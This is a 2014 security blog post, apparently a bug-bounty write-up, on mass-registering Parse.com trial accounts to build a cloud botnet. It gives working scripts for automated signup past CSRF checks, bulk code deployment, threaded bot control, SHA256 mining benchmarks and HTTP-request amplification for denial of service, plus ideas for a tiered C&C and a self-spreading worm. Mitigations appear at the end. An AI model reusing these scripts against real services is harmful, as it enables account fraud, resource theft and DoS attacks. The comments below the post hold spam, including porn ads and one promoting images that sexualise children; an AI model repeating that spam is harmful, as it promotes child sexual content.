Wednesday 10 September 2014

Building a Cloud Botnet on Parse.com

Today I'm going to talk about Parse.com and a trial account feature that allowed me to build a cloud botnet.

Parse is a cloud based app service that lets you deploy and run your app code in the cloud making building and maintaining apps easier. Facebook bought the company in 2013 and with it being eligible for the bounty program I thought I'd take a look for security issues.


Want a free account?

Parse offer free trial accounts with 20GB storage, 2TB traffic per month, a maximum of 30 requests/sec and the ability to run one process at a time for a maximum of 15 seconds before it's killed.

The stats above are for one account, but how about if we sign up for two accounts? Well that would effectively double all my quotas. How about a hundred, thousand or a million accounts? I could massively increase my limits and cause all kinds of mischief.

Taking a look at the registration page (in 2013) there was no hardening at all. Account registration was as simple as sending this POST request:


In 2013 no email verification was required, no CSRF token, no captcha, no throttling. The security team had basically missed the registration page. One year later, email verification is still not required. A CSRF header is now required and so is a session cookie. But there still isn't any anti-automation so anyone could register a million trial accounts.


Building my army

In 2013 it was easy to register accounts by just using Burp Intruder to send multiple registration POST requests. Because of the new session/CSRF requirements in 2014 I created a python script to perform registration.

The script will connect to Parse, grab session info and CSRF header, register an account, register an app for that account then grab the API keys which we'll need to communicate with our bots.

My account creation script:
import requests
import re
from random import randint

for i in xrange(0,100,1):
    user = "blahblah" + str(randint(100,999))
    print user

    print "[+] Getting Parse main page"    
    s = requests.Session()
    r = s.get('https://parse.com')
    global csrf;
    csrf = re.findall('[a-zA-Z0-9+/]{43}=', r.text);
    print "-----CSRF Token: " + csrf[0]
    s.headers.update({'X-CSRF-Token': csrf[0]})

    print("[+] Posting registration request");
    payload = {'user[name]':user, 'user[email]':user+'@test.com', 'user[password]':'password1'};
    r = s.post('https://parse.com/users', params=payload)
    print r.status_code

    print("[+] PUTing new app name");
    s.headers.update({'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'})
    payload = {'user[company_type]':'individual','parse_app[name]':'blahblahblah'+str(randint(100,999))};
    r = s.put('https://parse.com/account', params=payload);
    print r.status_code

    print("[+] Grabbing keys");
    r = s.get('https://parse.com/account/keys');
    print r.status_code
    print user +':'+ str(keys[0]).replace('<input type="text" value="','') + ':' + str(keys[5]).replace('<input type="text" value="','')


Using the Parse tools to deploy code

There are two ways to deploy code either using the Parse tool (a packaged python script) or directly through the API (api.parse.com/1/deploy). Directly connecting to the API is the cleaner option but it would have taken me a while to reverse the Parse tool and extract the integrity check code. To save time I just used the Parse tool as is. To use the tool though you need to create a project locally and add your apps before you can deploy code.

Create a new project:
parse new parsebotnet

Add every app locally:
#!/usr/bin/expect -f
for {set i 1} {$i < 101} {incr i 1} {
set timeout -1
spawn parse add
expect "Email:*"
send -- "test$i@test.com\r"
expect "Password:*"
send -- "test$i\r"
expect "Select an App:"
send -- "1\r"
send -- "\r"
}

You can then grep the appids and keys from the global.json settings file:
cat global.json|grep applicationId|cut -d "\"" -f4 > appid
cat global.json|grep masterKey|cut -d "\"" -f4 > keys

To send code to Parse you just put code in the cloud folder on your local machine and run the deploy command. I started off by putting the helloworld program in main.js:
Parse.Cloud.define("hello", function(request, response) {
  response.success("Hello world!");
});

And uploaded it to every bot using a bash for loop:
#!/bin/bash
for i in {1..100};do echo "Job#$i";parse deploy testapp1$i & done;

Not the cleanest approach but the Parse tool does all of the leg work.


Running Code

With the bot accounts created and code uploaded I could call the API and have the bots actually run my code. The simple approach was just using Curl:
#!/bin/bash

eof=0
exec 5<appid
exec 6<key
while [[ $eof -eq 0 ]]
do
 if read l1<&5; then
  read l2 <&6
  curl -X POST -H "X-Parse-Application-Id: $l1" -H "X-Parse-Master-Key: $l2" -H "Content-Type: application/json" -d {} https://api.parse.com/1/functions/hello
  printf "\n"
 else
  eof=1
 fi
done

I also put together a more snazzy python script with threading code from stackoverflow:
import requests
import re
from random import randint
import threading
import time
import Queue
import json

with open("appid") as f:
    appid = f.readlines()

with open("keys") as f:
    key = f.readlines()

s = requests.Session()

def callapi(x):
    s.headers.update({'X-Parse-Application-Id': appid[x].rstrip()})
    s.headers.update({'X-Parse-Master-Key': key[x].rstrip()})
    payload = {'' : ''}
    r = s.post('https://api.parse.com/1/functions/hello', data=json.dumps(payload))
    print "No: " + str(x) + "  Code:" + str(r.status_code) + "  Dataz:" + str(r.text)

queue = Queue.Queue()

class ThreadUrl(threading.Thread):

  def __init__(self, queue):
    threading.Thread.__init__(self)
    self.queue = queue

  def run(self):
    while True:
      #grabs host from queue
      j = self.queue.get()

      #grabs urls of hosts and prints first 1024 bytes of page
      callapi(j)

      #signals to queue job is done
      self.queue.task_done()

start = time.time()
def main():

  #spawn a pool of threads, and pass them queue instance
  for m in range(160):
    t = ThreadUrl(queue)
    t.setDaemon(True)
    t.start()

  #populate queue with data  
  for n in xrange(0,1000,1):
    queue.put(n)

  #wait on the queue until everything has been processed    
  queue.join()

main()
print "Elapsed Time: %s" % (time.time() - start)


Do something cool!

At this point I'm sure a few of you are like this:


And I guess you're wondering, after all this configuration, what can you actually do?

Well Parse allows you to process data and send HTTP requests. For a bad guy this means they could do things like mine bitcoins, crack hashes, DOS attacks or proxy malicious requests. For testing purposes I decided to focus on bitcoin mining and DOS proof of concepts.


$$$ Mining some coin $$$

Knowing next to nothing about bitcoin mining I did a little Googling and came across the post here that had a great practical explanation of mining. As mining basically consists of SHA256 hashing I decided to create a hashing benchmark script for Parse. As Parse uses Javascript I took the SHA256 crypto JS here and uploaded it to Parse with a for loop and timer.

Parse.Cloud.define("sha256", function(request, response) {

<insert CryptoJS code>

start=newdate();
for(i=0;i<request.params.iter;i++){
CryptoJS.SHA256("Message" + i);
}
response.success("time: " + ((new Date())-start)/1000);
});

Testing different iteration values I found one Parse instance could handle roughly 40,000 hashes per second which is pretty slow. Using the threaded python script I included above I continually called multiple instances and could hit about 6,000,000 hashes per second. But even this is no where near the speeds of real mining hardware. (Also real mining uses double SHA256 so the 6Mh/s is probably nearer 3Mh/s in real terms)

Part of the problem is the 15 second time limit on Parse processes, another issue is Parse have throttling in place so if you make too many API requests they start blocking connections. So bitcoin mining seemed possible but not practical with the current restrictions.


Denial Of Service

Using multiple trial accounts and some form of amplification I was curious how high I could get my outbound traffic volume (going from Parse to my target).

Starting with some simple httpRequest code I was able to get my instance to send thirty outbound requests for every one API request, proving amplification was possible. Two things to note though, the outbound requests go at a max rate of around 15 requests a second, also you need to remove the success/error response as that will close the process.

Example test code is below:
Parse.Cloud.define("amptest", function(request, response) {

for(j=0;j<request.params.scale;j++){
Parse.Cloud.httpRequest({
        url: 'http://myip/hello',
        method: 'POST',
        body: {
        countj:j
        },
        success: function(httpResponse) {
            //response.success(httpResponse.text);
        },
       error: function(httpResponse) {
            //response.error("Some error: "+httpResponse.status);
       }
    });
}
});

When scaling this up though the bottleneck is the same as the bitcoin mining, 15 second processes and max API requests per second limit the throughput. But is there any way around these restrictions?


C&C in the cloud?

It dawned on me that instead of using my workstation as the command and control I could use one of my apps as the C&C. I could send one request to my C&C app and he would communicate with all the other apps. But why stop at one C&C? Having one master, multiple slave C&C's and a pool of workers would in theory help increase throughput as I would be sending requests from multiple Parse ip addresses.
I created some recursive app code that included a list of every bot's appid and key and pushed this to every bot. The code would select bots at random and request that they run the same code. I passed a counter parameter that was incremented after each request to give the illusion of a tiered infrastructure. When the counter hit the "worker tier", instead of calling other bots, the bot would send multiple http requests to the target site.

With multiple workers all simultaneously connecting to the target ip i got something like this:


The source ip is Parse, the destination is my local machine. Looking at the "Time" column you can see a throughput of roughly 600-1000 requests per second. For me this was a promising start and I'm sure with some code tweaks, more bots and more than one external ip, the requests per second could have been increased substantially.


90's worm + 2014 cloud = CLOUD WORM!?

Although I didn't have time to build a working POC I think it may be possible to build a cloud worm on Parse. In a nutshell, as Parse allow accounts to run code and send http requests, there is the possibility that a Parse app could itself create a new account, deploy and then run code. The new account would then repeat this process and so on, gradually consuming the entire cloud's resources.

Cloud worm POC is this weeks homework, class dismissed ;)


Final Thoughts

Letting people run code on your servers is a risky business. To prevent abuse you need a solid sandbox and tight resource restrictions/monitoring. In this post I've only scratched the surface of Parse looking at some super obvious issues. I wish I'd had more time to dig into the cloud worm possibilities as well as background jobs which looked interesting.

Mitigation-wise anti-automation and email verification on the sign-up page would have helped. As would tighter inbound/outbound throttling/resource restrictions for trial accounts and also blocking app to app access. I don't think Facebook/Parse chose to implement any of these fixes and instead decided to focus on monitoring for suspicious resource usage.

Questions, comments and corrections are always appreciated! Thanks for reading.

Pwndizzle out.

15 comments:

  1. Nice job! I'm re-thinking about using Parse.com now.

    ReplyDelete
  2. Gelbooru is the Japanese website made with hentai, this website has millions of photos of Japanese children. Millions of tourists are coming to this website and looking at these images. In addition, it has its own website to address various forms of categories showing specific outcomes. Anyone can create an account here and access free photos to create a free account user who needs to register.

    ReplyDelete

  3. We have formally relaunched YesPornPlease with a large number of recordings, channels for pornography adoring network. In the event that you love free full-length HD pornography recordings, that YesPornPlease can offer, at that point this cylinder site is for you. Snap and appreciate most sultry XXX videos for nothing!

    ReplyDelete
  4. Hi....
    Use mLab to create a free MongoDB deployment on Google Cloud Platform (only US-central). Modify app.yaml to update your environment variables.
    You are also read more How to apply for a Business Loan Online

    ReplyDelete
  5. It is good to hear that your store is now expanding to new locations. I have been a patron of Fantastic Eyes because of all the wonderful work that you guys do. write my assignment for me I hope that this expansion move of yours will turn out to be successful. I will definitely go and see this new store of yours

    ReplyDelete
  6. As a new forex trader you need to know what the best brokers offers and their How To Start A Forex Broker before you begin trading and investing, Use this guide to learn about trading costs, leverage and leverage limits, spreads and execution times, custodial services and market maker spreads .

    ReplyDelete
  7. I think you can make a video about it for tiktok and buy tiktok likes for your video. What do you think about it?

    ReplyDelete
  8. There's at least one person who doesn't like it! It's good to know that if you become enraged, it's because you did something online book promotion services they didn't;)

    ReplyDelete

  9. Superb blog and great post.Its truly supportive for me, anticipating for all the more new post. Continue Blogging!

    Thank you for the informative post. It was thoroughly helpful to me. Keep posting more such articles and enlighten us.

    Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    blog is nice and much interesting which engaged me more.Spend a worthful time.keep updating more.

    This is an excellent post I seen thanks to share it. It is really what I wanted to see hope in future you will continue for sharing such a excellent post.

    Your info is really amazing with impressive content..Excellent blog with informative concept. Really I feel happy to see this useful blog, Thanks for sharing such a nice blog..

    Good Post! Thank you so much for sharing the post, it was so good to read and useful to improve.

    Wonderful blog & good post.Its really helpful for me, awaiting for more new post. Keep Blogging!

    Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites

    Thanks for such a great blog here. I was searching for something like this for quite a long time and at last, I’ve found it on your blog. It was definitely interesting for me to read about their market situation nowadays.

    Biotech Internships | internships for cse students | web designing course in chennai | it internships | electrical engineering internships | internship for bcom students | python training in chennai | web development internship | internship for bba students | internship for 1st year engineering students

    ReplyDelete
  10. Best Forex Broker In Burma Get Information On The Best Forex Brokers In Burma. Read Reviews, Compare The Best Trading Platforms, & Find The Right Broker For You.

    ReplyDelete
  11. The post is really superb. It’s varied accessory information that consists during a basic and necessary method. Thanks for sharing this text. The substance is genuinely write my paper for me composed. This web log is frequently sharing useful actualities. Keep sharing a lot of posts.

    ReplyDelete
  12. genuinely need to take a gander at this and understand this side of your story. It's surprising you're not more standard since you undeniably have the gift Thanks for bestowing this best stuff to us! Keep on help with assignment writing uk sharing! I'm new in blog writing.All types composes and posts are not helpful for the readers.Here the author is giving worthy insights and thoughts to each and every perusers through this article. Quality of the substance

    ReplyDelete
  13. This comment has been removed by the author.

    ReplyDelete